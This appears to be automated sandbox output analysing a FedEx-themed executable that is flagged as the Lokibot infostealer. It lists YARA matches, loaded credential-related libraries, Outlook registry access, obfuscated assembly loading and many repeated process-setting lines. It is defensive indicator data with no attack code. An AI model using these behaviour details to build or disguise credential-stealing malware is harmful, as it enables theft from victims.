                Source: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 00000000.00000002.1218835843.000000000423E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000000.00000002.1218835843.000000000423E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000000.00000002.1218835843.000000000423E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000000.00000002.1218835843.00000000042BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000000.00000002.1218835843.00000000042BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000000.00000002.1218835843.00000000042BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000000.00000002.1218365213.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000000.00000002.1218365213.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000000.00000002.1218365213.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: Process Memory Space: FedEx_776282383902.exe PID: 6752, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: Process Memory Space: FedEx_776282383902.exe PID: 6192, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: FedEx_776282383902.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.FedEx_776282383902.exe.30b6ed4.0.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                Source: 0.2.FedEx_776282383902.exe.30a6ebc.1.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                Source: 0.2.FedEx_776282383902.exe.311bddc.3.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                Source: 0.2.FedEx_776282383902.exe.5a40000.9.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/3@0/1
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeCode function: 3_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,3_2_0040650A
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeCode function: 3_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,3_2_0040434D
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FedEx_776282383902.exe.logJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeMutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeMutant created: NULL
                Source: FedEx_776282383902.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: FedEx_776282383902.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: FedEx_776282383902.exeReversingLabs: Detection: 65%
                Source: unknownProcess created: C:\Users\user\Desktop\FedEx_776282383902.exe "C:\Users\user\Desktop\FedEx_776282383902.exe"
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess created: C:\Users\user\Desktop\FedEx_776282383902.exe "C:\Users\user\Desktop\FedEx_776282383902.exe"
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess created: C:\Users\user\Desktop\FedEx_776282383902.exe "C:\Users\user\Desktop\FedEx_776282383902.exe"Jump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeSection loaded: samlib.dllJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
                Source: FedEx_776282383902.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: FedEx_776282383902.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                Data Obfuscation

                barindex
                Source: 0.2.FedEx_776282383902.exe.7d90000.11.raw.unpack, LoginForm.cs.Net Code: _206B_206C_202A_202D_206F_206F_206C_202D_206A_202A_200B_206C_206E_206A_206D_206B_202C_206E_200C_206F_200D_206D_200C_200F_202C_206C_202E_206B_202B_202E_206E_206B_206B_206D_206C_202C_200D_202E_202C_200E_202E System.Reflection.Assembly.Load(byte[])
                Source: Yara matchFile source: 3.2.FedEx_776282383902.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.FedEx_776282383902.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.FedEx_776282383902.exe.42bab30.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.FedEx_776282383902.exe.42a0b10.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.FedEx_776282383902.exe.42a0b10.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.FedEx_776282383902.exe.42bab30.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1218835843.000000000423E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1218835843.00000000042BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1218365213.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: FedEx_776282383902.exe PID: 6752, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: FedEx_776282383902.exe PID: 6192, type: MEMORYSTR
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeCode function: 0_2_012CF478 push esp; iretd 0_2_012CF479
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeCode function: 3_2_00402AC0 push eax; ret 3_2_00402AD4
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeCode function: 3_2_00402AC0 push eax; ret 3_2_00402AFC
                Source: FedEx_776282383902.exeStatic PE information: section name: .text entropy: 7.9734414761650525
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
